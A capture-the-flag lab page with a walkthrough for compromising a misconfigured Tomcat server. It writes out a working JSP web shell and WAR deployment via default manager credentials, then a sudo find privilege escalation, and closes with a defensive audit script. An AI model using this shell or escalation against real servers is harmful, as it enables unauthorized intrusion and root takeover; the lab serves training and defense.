Compromised 1

  • Medium
  • Released 11 Nov 2024

🔥 Can you compromise this misconfigured Tomcat server?

Dive into a realistic web application penetration testing scenario featuring Apache Tomcat. This server has been left with dangerous default configurations and sudo misconfigurations that could lead to complete system compromise. 🎯 Master the art of web application exploitation, WAR file deployment, and Linux privilege escalation in this hands-on challenge.

2 flags, 40 points. Difficulty: Medium. Solution available, free access. The lab runs on a dedicated private AWS instance (about 1-2 minutes of setup).

Compromised 1 - Complete Solution Walkthrough

Step 1: Web Application Reconnaissance

  1. Start by scanning the target to identify open ports (a SYN scan needs raw sockets, so run nmap as root; -Pn skips host discovery in case ICMP is filtered):
nmap -sS -sV -Pn <target-ip>
  2. The scan reveals that ports 80 (HTTP) and 8080 (Apache Tomcat) are open.
  3. Navigate to the Tomcat web application:
http://<target-ip>:8080

Step 2: Tomcat Manager Access

  1. Look for the Tomcat Manager application (it prompts for HTTP Basic credentials):
http://<target-ip>:8080/manager/html
  2. Try common default credentials: username admin, password admin.
  3. Successfully access the Tomcat Manager interface. Note that a stock Tomcat defines no manager user at all and, since 8.5, limits the manager app to localhost with a RemoteAddrValve; this box deliberately ships with an admin/admin manager account and the manager reachable remotely.

Step 3: WAR File Deployment

  1. Create a simple JSP web shell (note: reverse shells won't work as outbound traffic is blocked). The shell hands the cmd parameter to Runtime.exec, which splits it on whitespace and does not go through /bin/sh, so pipes, quotes and redirection are not interpreted, and only stdout is returned:
mkdir webshell
cd webshell
echo '<%@ page import="java.io.*" %><% String cmd = request.getParameter("cmd"); if(cmd != null) { Process p = Runtime.getRuntime().exec(cmd); BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while((line = reader.readLine()) != null) { out.println(line + "<br/>"); } } %>' > shell.jsp
jar -cvf ../shell.war *
cd ..
  2. Deploy the WAR file through the Tomcat Manager interface (Deploy section, "WAR file to deploy"); Tomcat derives the context path from the file name, so shell.war is served under /shell
  3. Access your deployed web shell:
http://<target-ip>:8080/shell/shell.jsp?cmd=whoami

Step 4: Initial System Access

  1. Verify you have command execution as the 'hacker' user:
http://<target-ip>:8080/shell/shell.jsp?cmd=id
  2. Retrieve the user flag:
http://<target-ip>:8080/shell/shell.jsp?cmd=cat /home/flag-user.txt

Step 5: Privilege Escalation Enumeration

  1. Check sudo privileges for the current user (this only works through the web shell because no password is required; sudo has no terminal to prompt on):
http://<target-ip>:8080/shell/shell.jsp?cmd=sudo -l
  2. The output shows that the hacker user can run /usr/bin/find as root without a password (NOPASSWD)

Step 6: Root Flag Retrieval

  1. With root privileges, retrieve the root flag. find's -exec runs its action as root, so the same sudo rule gives arbitrary root command execution, not just file reads. The URL-encoded request below is sudo find /root -name flag-root.txt -exec cat {} +
http://<target-ip>:8080/shell/shell.jsp?cmd=sudo%20find%20/root%20-name%20flag-root.txt%20-exec%20cat%20%7B%7D%20%2B
  2. You now have both user and root flags, completing the challenge

Security Implications and Lessons Learned

  • Default Credentials: Using default credentials like admin/admin makes web applications vulnerable to unauthorized access
  • Tomcat Manager Exposure: Exposing the Tomcat Manager interface without proper access controls lets anyone holding manager credentials deploy arbitrary code (a WAR) that runs as the Tomcat service user
  • Sudo Misconfigurations: Granting sudo access to binaries that can execute other programs, such as find with -exec, is equivalent to granting a root shell
  • Defense: Change default credentials, restrict manager access (keep the RemoteAddrValve, or don't deploy the manager app on servers that don't need it), and carefully configure sudo permissions
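
An audit script for the three weaknesses listed above, added here as an example (the editor's code, not the lab's or Tomcat's). It checks tomcat-users.xml for privileged manager roles paired with empty, well-known or username-equal passwords, checks the manager app's context.xml for the RemoteAddrValve/RemoteCIDRValve that stock Tomcat ships with, and flags sudoers rules for binaries that can run other programs. The sample inputs are constructed to resemble this lab, the weak-password list and the shell-escape binary list are short illustrative subsets, and passwords stored digested won't match the list and are not flagged.

```python
#!/usr/bin/env python3
"""Audit for the misconfigurations this lab turns on: weak privileged Tomcat
manager accounts, a manager app reachable from any address, and sudo rules
for binaries that hand out a root shell. Added example with constructed inputs."""
import re
import xml.etree.ElementTree as ET

MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                 "admin-gui", "admin-script"}
WEAK_PASSWORDS = {"", "admin", "tomcat", "s3cret", "password", "manager", "changeme", "root"}
# Illustrative subset of sudo targets that execute arbitrary commands as the
# run-as user (find -exec, editor/pager shell escapes, interpreters, archivers).
SHELL_ESCAPE_BINARIES = {"find", "vim", "vi", "nano", "less", "more", "awk", "perl",
                         "python", "python3", "bash", "sh", "env", "tar", "zip"}
# sudoers user specification: user host=(runas) [TAG:]... command[, command]...
SUDOERS_SPEC = re.compile(r"^(?P<who>[^\s=]+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\([^)]*\)\s*)?(?P<spec>.+)$")


def _local(tag: str) -> str:
    return tag.split("}")[-1]  # drop the {xmlns} prefix ElementTree adds to tag names


def audit_tomcat_users(xml_text: str) -> list:
    """Flag privileged users whose password is empty, well known, or equals the username."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if _local(elem.tag) != "user":
            continue
        name = elem.get("username") or elem.get("name") or "?"
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        privileged = sorted(roles & MANAGER_ROLES)
        if privileged and (password.lower() in WEAK_PASSWORDS or password.lower() == name.lower()):
            findings.append(f"tomcat-users.xml: '{name}' holds {privileged} with a weak or default password")
    return findings


def audit_manager_context(xml_text: str) -> list:
    """Stock Tomcat limits manager/META-INF/context.xml to localhost with a RemoteAddrValve;
    removing or commenting it out (comments are dropped by the parser) exposes the manager."""
    for elem in ET.fromstring(xml_text).iter():
        if _local(elem.tag) == "Valve" and elem.get("className", "").endswith(("RemoteAddrValve", "RemoteCIDRValve")):
            return []
    return ["manager context.xml: no RemoteAddrValve/RemoteCIDRValve, manager reachable from any client address"]


def audit_sudoers(text: str) -> list:
    """Flag rules granting shell-escape binaries (with or without a password) or ALL with NOPASSWD."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")):
            continue
        m = SUDOERS_SPEC.match(line)
        if not m:
            continue
        who, spec = m.group("who"), m.group("spec")
        nopasswd = "NOPASSWD:" in spec
        for cmd in spec.split(":")[-1].split(","):  # tags such as NOPASSWD:/SETENV: precede the last colon
            words = cmd.split()
            if not words:
                continue
            binary = words[0].rsplit("/", 1)[-1]
            if binary in SHELL_ESCAPE_BINARIES or (words[0] == "ALL" and nopasswd):
                findings.append(f"sudoers: {who} may run {words[0]}{' without a password' if nopasswd else ''}; "
                                f"{binary} can execute arbitrary commands as root")
    return findings


def audit_all(users_xml: str, manager_context_xml: str, sudoers_text: str) -> list:
    return (audit_tomcat_users(users_xml) + audit_manager_context(manager_context_xml)
            + audit_sudoers(sudoers_text))


# Constructed sample inputs modelled on this lab (not copied from the target).
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="admin" password="admin" roles="manager-gui,admin-gui"/>
  <user username="deployer" password="Xq9!v2Lp#Tr8wZ" roles="manager-script"/>
  <user username="guest" password="guest" roles="probe"/>
</tomcat-users>
"""
SAMPLE_MANAGER_CONTEXT_WEAK = '<Context antiResourceLocking="false" privileged="true"/>\n'
SAMPLE_MANAGER_CONTEXT_OK = """<Context antiResourceLocking="false" privileged="true">
  <Valve className="org.apache.catalina.valves.RemoteAddrValve"
         allow="127\\.\\d+\\.\\d+\\.\\d+|::1|0:0:0:0:0:0:0:1"/>
</Context>
"""
SAMPLE_SUDOERS = """Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
hacker  ALL=(ALL) NOPASSWD: /usr/bin/find
backup  ALL=(root) NOPASSWD: /usr/bin/df -h, /usr/bin/uptime
"""

if __name__ == "__main__":
    for finding in audit_all(SAMPLE_TOMCAT_USERS, SAMPLE_MANAGER_CONTEXT_WEAK, SAMPLE_SUDOERS):
        print(finding)
```

Run against the real files (conf/tomcat-users.xml, webapps/manager/META-INF/context.xml, /etc/sudoers plus /etc/sudoers.d/*) the script reports the admin/admin manager account, the missing address valve and the hacker/find rule; the strong-password manager-script account and the password-protected ALL rules for root and %sudo are left alone.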

Tools and Techniques Summary

  • nmap: Network reconnaissance and port scanning
  • JSP web shells: Custom web shell creation for command execution
  • Tomcat Manager: Web application deployment interface
  • find binary: Exploiting sudo misconfigurations for privilege escalation